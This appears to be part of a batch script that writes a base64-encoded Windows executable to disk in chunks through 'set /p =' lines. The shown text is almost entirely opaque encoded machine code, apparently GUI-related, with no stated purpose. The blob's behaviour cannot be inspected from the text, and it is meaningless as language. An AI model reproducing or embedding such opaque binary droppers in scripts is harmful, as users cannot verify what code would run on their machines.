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
set /p =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
set /p =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